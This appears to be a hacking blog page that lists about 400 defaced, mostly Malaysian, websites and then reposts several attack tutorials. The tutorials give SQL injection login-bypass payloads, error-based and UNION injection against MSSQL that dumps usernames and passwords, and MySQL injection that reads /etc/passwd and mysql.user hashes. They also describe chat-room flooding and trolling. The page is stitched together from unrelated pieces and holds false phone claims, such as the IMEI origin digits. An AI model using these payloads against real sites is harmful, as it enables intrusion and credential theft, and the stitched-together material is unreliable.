More than 400 Websites Hacked yesterday, majority were Malaysians

Hi, :) More than 400 websites got mass defaced by hacker yesterday. Under the list of victims most of them were Malaysian websites. Here’s a list of victims Check if your domain is part of the defacementation. Full list of defaced website after jump.



aboycalledsu.hazardcell.com
g2h.hazardcell.com
hazardcell.com
url.hazardcell.com
tk.hazardcell.com
webbuilder.com.my orders.webbuilder.com.my
support.webbuilder.com.my
ime.sscity.net
tribezone.net
myhome.net.my
mp3players.allnetweb.info
pvr-sabah.north-borneo.com
ramlanabdullah.fotomomo.com
burnz.teruja.com
emalaysiatravel.gbavatar.com
audio.emirin.name
304.webactives.com
dating-site.date2u.com
secretstrategy.ringgithit.com
eisnetz.com
ramakrishna-sarada.org
alumni.ixora.biz
diyersitzone.net
my.mtsociety.com
blog.reriki.net
cy.mrdefinite.com
blog.teruja.com
susuday.mollique.com
bigcow.mollique.com
sawadeepool.com
kongkong.gbavatar.com
p7.cablefault.net
xchange-i.com
blogrss.bodypowerfc.com
cflee.diyersitzone.net
fotos.dlrg.d-f-n.com
rangsangmas.rajeshpal.com
cft-articles.com
mandarinuniversity.koobros.net
maplestory.gbavatar.com
mensexualhealth.net
procom.mymegashop.com
forex.getprofit.net
shop.makeitlove.com
qionlee.com
proxy.sscity.net
dolphinet.net
planet.tauhoo.com
webactives.com
iklanimej.com
myfriendaddersecret.ringgithit.com
cmaxsoft.com
board.eisnetz.com
go.derrickflc.com
entwurvian.nocturnius.com
amriteswarifoundation.org
nicheinfoproduct.com
perananglobal.com
rajinder.gandhara.org
doe-gis.net
wanida.myrakanit.com
gradhan.com
q2df.com
wangberkat.com
adinfoservices.com
engkabang.net
sahoca.net
blog.gbavatar.com
p1.sawadeepool.com
mollique.com
desirehouse.net
phpnuke.pm10freaks.com
homeideas.myhome.net.my
ainasakina.myfamili.net
www3.drismailtambi.com
alifjohan.myfamili.net
biz.tauhoo.com
photo.emirin.name
suhailaagency.xchange-i.com
ftcomp.com
uniquecanyon.dgvmedia.com
smksb.edu.my
makeitlove.com
projectsecretariat.net
netclicksolution.com
asianmath.com
tactle.com
gandhara.org
gpix.derrickflc.com
acmeuniversity.koobros.net
aprilng.virgiesphere.net
studiow.filament-phase.com
wekgna.com
jordanje.com
stromberg-malaysia.com
linkcom.dgvmedia.com
weightdilemma.com
mpmku.akalkita.com
etacmedia.com
video.emirin.name
gunbound.gbavatar.com
ixoracommy.ixora.biz
firstummah.com
designs.melvinel.com
kuching2u.myhome.net.my
cyberjayaonline.com
mybigcoworg.mollique.com
worldprivilege.dgvmedia.com
halmie.com
archerz.net
forexdaily.3rdpartyexchange.com
project.emirin.name
myfamili.net
indesignbuild.inbanglow.com
ramadhan1428.xchange-i.com
siu.rajeshpal.com
1.mdzakri.com
sar-alhidayah.lamanwebsekolahku.com
loan.ringgithit.com
project.netclicksolution.com
tauhoo.com
nocturnius.com
forum.engkabang.net
citogroup.com.my
prepaid.lorongstadium.com
forum.senilensa.com
118plugins.ringgithit.com
swisscash.halmie.com
download2u.info
getprofit.net
timetothrift.com
home.gandhara.org
senilensa.com
groomingdales.com.my
emirin.name
buyatheme.com
triptomalaysia.webactives.com
acemaildrop.com
koobros.net
heartchambers.lunaireave.com
uptownace.gradhan.com
chungsan.net
rajeshpal.com
loans.ringgithit.com
fabuloushampers.filament-phase.com
mysite2u.biz
dearlainey.drismailtambi.com
koobrosbiz.koobros.net
intouch-logistics.com
img.eisnetz.com
gsus.biz
mpmku.xchange-i.com
meridiantouch.filament-phase.com
mtsociety.com
muftizab.com
tahooorg.tauhoo.com
knightonline.gbavatar.com
shoppe.north-borneo.com
ixora.biz
photos.mrdefinite.com
p9sport.com
i-smartsolutions.com
guestbook.emirin.name
adsense-profits-unlimited.com
hijabhaven.com
eimir.com
borneotransway.com.my
ramadhan.xchange-i.com
nagawerks.com
yippeego.yippeego.com
plaza.abiummi.com
gempaq.us
mohram.filament-phase.com
lotuswell.com
myrakanit.com
karyastudio.drismailtambi.com
tools.eisnetz.com
zhongg.com
free.educationaltoygifts.com
sks.educationaltoygifts.com
m3lvin.org
enochlau.com
filme.d-f-n.com
habbohotel.gbavatar.com
sgt.sabahbiz.com
meatballicious.net
adsenseseo.ringgithit.com
wwluck.etacmedia.com
biase.myxstream.org
female.drismailtambi.com
kelabremajamutiara.com
blog.emirin.name
blog.makeitlove.com
1.lunaireave.com
m203.gandhara.org
myhome.myhome.net.my
cathcollections.com
yippeego.com
forex.3rdpartyexchange.com
onlinestore.diyersitzone.net
vl.bodypowerfc.com
aushk.com
forum.seacoco.com
alphagiga.com
arepie.myxstream.org
pehome.dgvmedia.com
xpatmigrate.com
thenamecard.mysolobiz.com
shamshubaridah.myfamili.net
xiii.myrakanit.com
video.sscity.net
maricatur.mari4syafie.com
ehome.myhome.net.my
5dollar-egold.com
behindnews.emuse.cc
fromborneo.com
jeremiahfoo.emuse.cc
serambetul.com
brilliantcolorsthatyoubring.net
smkcyberjaya.allmoresynergy.com
tajulhealth.com
beautiful.mrdefinite.com
azrinhs.com
ringgithit.mensexualhealth.net
allnetweb.myfancyshop.com
jcc.gandhara.org
gateraiders.com
defirstinn.com.my
jomcode.drismailtambi.com
blog.bodypowerfc.com
2ndstuff.diyersitzone.net
forum.kaerazami.com
joininvest.com
sirehjunjung.com
kristalutama.rajeshpal.com
365.emuse.cc
magnitudesalon.flamingmarket.com
noirmystere.nocturnius.com
skuld.miyabiaizawa.com
davelynne.com
materealize.filament-phase.com
foochowgateway.swancity.net.my
nurarief.intouch-logistics.com
alam3d.com
bahteracappucino.com
kelzero.graveyardstudio.com
cherylsamad.filament-phase.com
xecom.projectsecretariat.net
sk-srikelana.lamanwebsekolahku.com
toolbar.sscity.net
date2u.drismailtambi.com
ustazshukri.drismailtambi.com
tyronmalaysia.filament-phase.com
live.netclicksolution.com
lionsutera.north-borneo.com
mobalex.com.my
emuse.cc
myxstream.org
1u.com.my
rui-en.com
3rdpartyexchange.com
acnewso.ringgithit.com
ramadhan1427.xchange-i.com
myfren.archerz.net
gurdz.gandhara.org
yewkit.com
malaysiaescapade.zodiascape.com
miyabiaizawa.com
minang.educationaltoygifts.com
educationaltoygifts.com
virgiesphere.net
test.senilensa.com
quiz.dlrg.d-f-n.com
myfancyshop.com
theworldsports.com.my
dog2u.myhome.net.my
smgozz.com
chineseknot.biz
kaerazami.filament-phase.com
esafaree.xchange-i.com
blogs.sammichin.com
bodypowerfc.com
wow.gbavatar.com
worldwebmasters.org
dragonflymxs.filament-phase.com
perfectworld.gbavatar.com
multhalib.fotomomo.com
tenggoldives.com
gratechdesign.sabahbiz.com
allmoresynergy.com
mymegashop.com
vertiglobal.drismailtambi.com
egold2u.3rdpartyexchange.com
cablefault.net
dquorum.com
9bw.lunaireave.com
beauty2k.com
rm.bodypowerfc.com
sloppychic.buyatheme.com
4d8888.com
asic.webactives.com
north-borneo.com
surayabatik.filament-phase.com
koobrosinfo.koobros.net
rawr.studio-ksg.net
photo.engkabang.net
mysolobiz.com
events2u.rajeshpal.com
conqueronline.gbavatar.com
photography.mtsociety.com
graveyardstudio.com
teruja.com
filament-phase.com
blog.ringgithit.com
renee-chung.com
prodgprojects.com
solobiz.mysolobiz.com
zodiascape.com
ip.teruja.com
unlimitedprofitstraffic.ringgithit.com
mdzakri.com
digitalzone.biz
no1invest.com
blog.abiummi.com
demam-afcom.jordanje.com
q4hd.q2df.com
seacoco.com
e-picdorlee.com
howmlmgurusgotrich.com
ime.sscity.net
my.mtsociety.com
myhome.net.my
mp3players.allnetweb.info
pvr-sabah.north-borneo.com
procom.mymegashop.com
burnz.teruja.com
emalaysiatravel.gbavatar.com
audio.emirin.name
304.webactives.com
dating-site.date2u.com
secretstrategy.ringgithit.com
eisnetz.com
ramakrishna-sarada.org
alumni.ixora.biz
blog.reriki.net
mensexualhealth.net
maplestory.gbavatar.com
cy.mrdefinite.com
tribezone.net
blog.teruja.com
susuday.mollique.com
bigcow.mollique.com
sawadeepool.com
kongkong.gbavatar.com
p7.cablefault.net
xchange-i.com
blogrss.bodypowerfc.com
cflee.diyersitzone.net
fotos.dlrg.d-f-n.com
electronics-directory.download2u.info
sammichin.diyersitzone.net
ilammotel.co.nz
reriki.net
akalkita.xchange-i.com
ragnarok.gbavatar.com
blog.diyersitzone.net
ceria.gempaq.us
ou.gradhan.com
millionaire-factory.net
inbanglow.com
blog.filament-phase.com
pbamonline.com
freeon9.q2df.com
gallery.sahoca.net
url.eisnetz.com
jobsmalaysia.download2u.info
bigwheelsabah.com
bigcoworg.mollique.com
julian.bigwheelsabah.com
hasansaid.myfamili.net
lorongstadium.com
suribia.com
matchwonder.mymegashop.com
swancity.net.my
dimira.net
mysecretstrategy.ringgithit.com
ambangideal.com
pssgm.reriki.net
louyau.net
matchmakerz.yippeego.com
engineers-hut.com
pm10freaks.com
mrdefinite.com
gpgc2u.dgvmedia.com
joomla.pm10freaks.com
gallery.miyabiaizawa.com
doa-member.myrakanit.com
blog.azrinhs.com
forums.ti-server.com
chat.netclicksolution.com
bbs.halobi.com
testbbs.halobi.com
calculator.sscity.net
boochang.worldwebmasters.org
dndkl.nagawerks.com
axisgrade.com
fengshui-geomancy.koobros.net
okayarms.jordanje.com
aimm.rajeshpal.com
ericool.webactives.com
electricalshop.com.my
nasa.com.my
test.gandhara.org
flamingmarket.com
addict-logic.net
econcept.dolphinet.net
iccclub.dgvmedia.com
intimanis.com
dgvmedia.com
blogazine.emuse.cc
music.melvinel.com
i-privileges.dgvmedia.com
borneotreasure.com
4irobot.com
biase.myxpitstop.com
tombogroup.filament-phase.com
jomlayanbiz.com
spatialglobe.com
devilro.org
swancitynet.swancity.net.my
youzi.emuse.cc
mobilestore2u.com
studio-ksg.net
lunaireave.com

wahahahahahaa :) MONITOR YOUR PC AND SERVER DATABASE ALL AHAHAHAHAHA :P

United Nations Hacked, Birleşmiş Milletler Hacked, Ayyıldız Tim, UN Hacked, BM Hacked, eno7, thehacker

Cyber Protest in world, turkish hacker, by m0sted, 1nd0-H4x0R, ayyildiz tim, youtube, hacker, zone-H.org, zone-h, mirror, kerem125, gsy, m0sted.net, sagopa kajmer, pesimisit, bir 2007, 2008, peace world protest.,eno7



- A funny movie is a click away

Basic Website Acct. Hacking

If you posess the HTML & JAVA knowledge then u can even acess password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
ur work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html codings with javascripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates ur
informaiton in the server.(Do this very carefully, ur success to
hack the site depends upon this i.e how efficiently u delete the
Javascripts that validate ur account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
maxlength of password is less than 11 then increase it to 11
(e.g : if then write

* Just go to file => save as and save it any where within
the hardisk with ext.html(e.g :c:hack.htm)

* Close ur webpage and go to the webpage u save in your
harddisk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!U hav cracked the above website and entered into the
account of Ist user saved in the server's database.

☺ ☺ ☺ ☺ The above trick doesn't work on the websites using latest
technique to protect there servers. ☺ ☺ ☺ Enjoy ☺ ☺ ☺ ☺ ☺

Hacking Database Servers

Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company . Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and al so the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database serve rs. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itsel f to be "unbreakable" But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a fe w months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with t hem a lot.

user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the loginche ck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of l ogin failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry ag ain.



"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the abo ve query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. N ow what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web desi gner ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same ti me 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doe sn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the abo ve mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.co m/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using querie s in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a vict im just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. T he same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.as ... pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method show s up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given valu e Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the q uery in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will ge t different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAM E which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarch ar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error conve rting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords So lets move in i t. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COL UMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COL UMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we woul d use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is noth ing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the i mportant ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password 'oldpass', 'newpass', 'username'

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server

version including the all info about the OS.
e.g. master..xp_msver REMEMBER USE YUR OWN RISK !!!!!!!!

Friendster And Myspace Chat Hacking -- Warning -- Exploits and Cheats Within

This Webchat Platform build from USERPLANE aol company
Flooders Can make Flood in this webchat system, Just Simple To make it

Example : (A HREF) IS A LINK BIG PARENT FROM A URL AND THE WEBCHAT SYSTEM EXPLORE IT!

Just Wrote : A HREF HREF HREF HREF HREF HREF HREF HREF HREF HREF HREF HREF HREF ....
AS many much you wrote this in your space in webchat room !

Watch and See My Action To hack People In The Friendster And My space WebChat !













So you want to know how to "cheat the system?" This is a simple and easy way to chat as no one and hassle people.
If you troll chat rooms as much as I do, your bound to run into different “hacks” and exploits. I have been
spending a lot of time in myspace chatrooms and occasionally someone would come into the chat with no name. They
literally had no name. They chatted as : . Those in the chat would just refer to them as dots. I was curious as to how to
do this, when I stumbled upon the answer.

The following could be considered a hack or an exploit, but to me, its just something that they should have coded for and
I plan on making it public knowledge.

The basic way to do it is to get the exact address for the chatroom you want.

See below for the room you wish to visit.

What you do is enter that chat room, without signing into myspace.com.

Now when you enter, you aren’t passing any credentials and are basically coming in as no one. Easy enough.
Now you can use this and totally mess with people, as they haven’t any idea as to who you are.

If you are already signed into myspace. You must sign off and clear your cookies and such, then relaunch the browser
directly to the chatroom.

So there you are, easy enough.

alabama

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=201

alaska

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=202

arizona

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=203

arkansas

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=204


california

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=205

colorado

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=206

connecticut

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=207

Delaware

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=208

District of columbia

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=209

florida

http://chat.myspace.com/userplane/chMain.cfm?subroomID=230&roomid=210


ENJOY GUYS :D

CELL PHONE HACKS

1. Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….

Just try the following steps and you’ll get a call to your cell phone from your own number.

1. Just give a missed call to this number.You’ll not be charged!

+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number

3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.

4. She say’s- Your PIN cannot be processed and the call disconnects..

ANOTHER TRICK

Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?

You will get a call from the number

+501

Reason behind this trick

God Knows!!

Just try and pass your comments. Tell me whether the second trick worked or not!!

2. Unlocking the iphone !

As we all know, iPhone is Subscriber Identity Module (SIM) locked. This means iphone was designed for and can be used by one carrier—AT&T in the United States—and offers a limited set of iPhone-compatible voice and data plans. Within weeks of its release, a hacker named iZsh created a tool named iASign, which allowed iPhone owners to unlock and use their phones with AT&T/Cingular plans that were not designed for the iPhone, including pay-as-you-go plans.

A month or two later, the iPhone Dev Team hackers released the iUnlock and anySIM tools (see Figure above), which allowed the iPhone to be unlocked and used with any Global System for Mobile communications (GSM) SIM from around the world.Within days of its release, the iPhone had been unlocked and used in dozens of countries,from Malaysia to Jamaica and from Norway to Pakistan.

Reacting to the iPhone Unlock tool, Steve Jobs said, “It’s a cat-and-mouse game. We try to stay ahead. People will try to break in, and it’s our job to stop them breaking in.” In late September 2007, Apple issued the following statement in a press release:

Apple has discovered that many of the unauthorized iPhone unlocking programs available on the Internet cause irreparable damage to the iPhone’s software,which will likely result in the modified iPhone becoming permanently inoperable when a future Apple-supplied iPhone software update is installed.Apple plans to release the next iPhone software update,containing many new features including the iTunes Wi-Fi Music Store(http://www.itunes.com/), later this week.Apple strongly discourages users from installing unauthorized unlocking programs on their iPhones.Users whomake unauthorized modifications to the software on their iPhone violate their iPhone software license agreement and void their warranty.The permanent inability to use an iPhone due to installing unlocking software is not covered under the iPhone’s warranty.

After releasing firmware update 1.1.1 for iPhone, Apple refused warranty service to bothunlocked phones and phoneswith third-party applications. Caveat emptorand hacker beware.

3. Is your Nokia Cell Phone Original ?

Nokia is one of the largest selling phones across the globe.Most of us own a Nokia phone but are unaware of it’s originality.Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.

Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).

Then check the 7th and 8th numbers

Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality

IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality

IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good

IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality

IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

MySQL: Secure Web Apps - SQL Injection techniques Part 2

---[ 0x05: Basic Victim Fingerprinting ]

In this part of the paper I'll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.

This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.

So, what we need to know? Could be interesting to know the mysql server version;
maybe it's a bugged version and we can exploit it.

How to do that? (I will not use bugged code; I'll just make some examples. Use your
mind to understand how to use "these tips")

mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
-----------------------------------------------------------------------------
| id                               | pri     | title                | texts                            |
-----------------------------------------------------------------------------
| 1                                |    0   | testing news 2 | could be bypassed easily? |
-----------------------------------------------------------------------------
| 5.0.22-Debian               | NULL | NULL              | NULL                             |
-----------------------------------------------------------------------------

Here our mysql version. Also the OS has been putted on the screen :) (take in mind that
sometimes these information are modified).

Could be interesting to know the server time:

mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
---------------------------------------------------------------------------
| id                           | pri     | title               | texts                              |
---------------------------------------------------------------------------
| 1                            |    0   | testing news 2 | could be bypassed easily?  |
---------------------------------------------------------------------------
| 2009-02-27 00:03:56 | NULL | NULL              | NULL                              |
---------------------------------------------------------------------------

Yes, sometimes is useful to know what is the user used to connect to the database.

mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;

--------------------------------------------------------------------
| id                  | pri     | title               | texts                             |
--------------------------------------------------------------------
| 1                   |    0   | testing news 2 | could be bypassed easily? |
--------------------------------------------------------------------
| omni@localhost | NULL | NULL              | NULL                             |
--------------------------------------------------------------------

An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:

select * from news where id=1 union select NULL,NULL,LOAD_FILE('/etc/passwd') from usr;

This is what my FireFox shows to me:

http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE('/etc/password')%20from%20usr;

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:

News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
[output cutted]
[...]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Sounds interesting right, don't you?

Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.

SELECT * FROM news WHERE id='1' UNION SELECT Host, User, Password FROM mysql.user/*'
-------------------------------------------------------------------------------[/]

---[ 0x06: Standard Blind SQL Injection ]

SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.

Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).

But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I'll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don't wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that -
"Optimizing the number of requests in blind SQL injection").

Ok, let's make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don't know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:

http://www.victim.net/CMS/view.php?id=1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:

SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1

Now, we (I hope)  have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I'm thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:

http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost'

and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let's go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I'm going to explain we need to know some basic information.

Function used in MySQL:

- ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.

mysql> select ascii('a');
-----------
| ascii('A') |
-----------
|         97 |
-----------

mysql> select ascii('b');
-----------
| ascii('b') |
-----------
|         98 |
-----------

- ORD(str)

If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:

(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) ...

If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.

- SUBSTRING(str,pos), SUBSTRING(str  FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str  FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.

- SUBSTR(str,pos), SUBSTR(str  FROM pos),
 SUBSTR(str,pos,len), SUBSTR(str  FROM pos FOR len)

